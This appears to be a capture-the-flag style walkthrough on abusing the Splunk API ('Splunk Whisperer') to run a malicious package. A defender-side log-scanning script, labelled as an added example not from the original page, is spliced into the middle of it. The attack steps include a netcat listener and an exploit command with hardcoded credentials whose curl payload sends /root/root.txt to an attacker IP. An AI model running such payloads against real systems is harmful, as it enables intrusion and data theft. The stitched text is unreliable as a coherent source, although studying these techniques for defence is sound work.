Splunk Whisperer
Overview
An authenticated attacker can send a malicious package to the Splunk API and have it executed. This can be done remotely or locally.
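A defender-side check for the behaviour described above, as an added example that is not from the original page or the tool's author: it scans splunkd_access.log-style lines for package-install requests to the management API and labels each as local or remote. The endpoint path `/services/apps/local`, the log layout, the `trusted_users` allowlist and the sample lines are assumptions constructed for illustration.

```python
import re
from ipaddress import ip_address

# Assumed access-log layout: client - user [timestamp] "METHOD URI HTTP/x" status ...
LINE_RE = re.compile(
    r'^(?P<client>\S+) - (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')
# Assumption: packages are installed by POSTing to the apps/local endpoint.
INSTALL_RE = re.compile(r'^/services(NS/[^/]+/[^/]+)?/apps/local/?(\?.*)?$')

# Constructed sample lines (documentation-range addresses, made-up users).
SAMPLE = [
    '127.0.0.1 - jdoe [12/Mar/2021:10:15:32.123 +0000] '
    '"POST /services/apps/local HTTP/1.1" 201 2345 "-" "python-requests/2.25.1" - 40ms',
    '203.0.113.7 - jdoe [12/Mar/2021:10:20:01.004 +0000] '
    '"POST /services/apps/local HTTP/1.1" 401 130 "-" "python-requests/2.25.1" - 2ms',
    '198.51.100.4 - svc_deploy [12/Mar/2021:11:00:00.000 +0000] '
    '"POST /services/apps/local HTTP/1.1" 201 2210 "-" "curl/7.68.0" - 35ms',
    '127.0.0.1 - admin [12/Mar/2021:11:05:00.000 +0000] '
    '"GET /services/apps/local HTTP/1.1" 200 9000 "-" "Splunk/8.0.5" - 5ms',
]

def find_app_installs(lines, trusted_users=frozenset()):
    """Return one finding per package-install request seen in the log lines."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or not INSTALL_RE.match(m["uri"]):
            continue  # listing apps (GET) and unrelated endpoints are ignored
        try:
            origin = "local" if ip_address(m["client"]).is_loopback else "remote"
        except ValueError:  # hostname or malformed client field
            origin = "unknown"
        findings.append({
            "time": m["ts"], "client": m["client"], "user": m["user"],
            "origin": origin,
            "succeeded": m["status"].startswith("2"),
            "expected": m["user"] in trusted_users,
        })
    return findings

if __name__ == "__main__":
    for f in find_app_installs(SAMPLE, trusted_users={"svc_deploy"}):
        if not f["expected"]:
            print("REVIEW", f)
```

Failed attempts are kept in the results because a 401 followed by a 2xx from the same account is worth correlating with credential exposure.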
Using python3 with the local exploit
- Convert the exploit to python3
# replace functions
raw_input() --> input()
print "some text" --> print("some text")
- Open a netcat listener on the attacker machine to receive the output
- Upload the exploit to the victim machine and run it
python3 PySplunkWhisperer2_local.py --port 8089 --username shaun --password Guitar123 --payload "curl -F 'data=@/root/root.txt' http://10.10.14.26:4444"
- Sample execution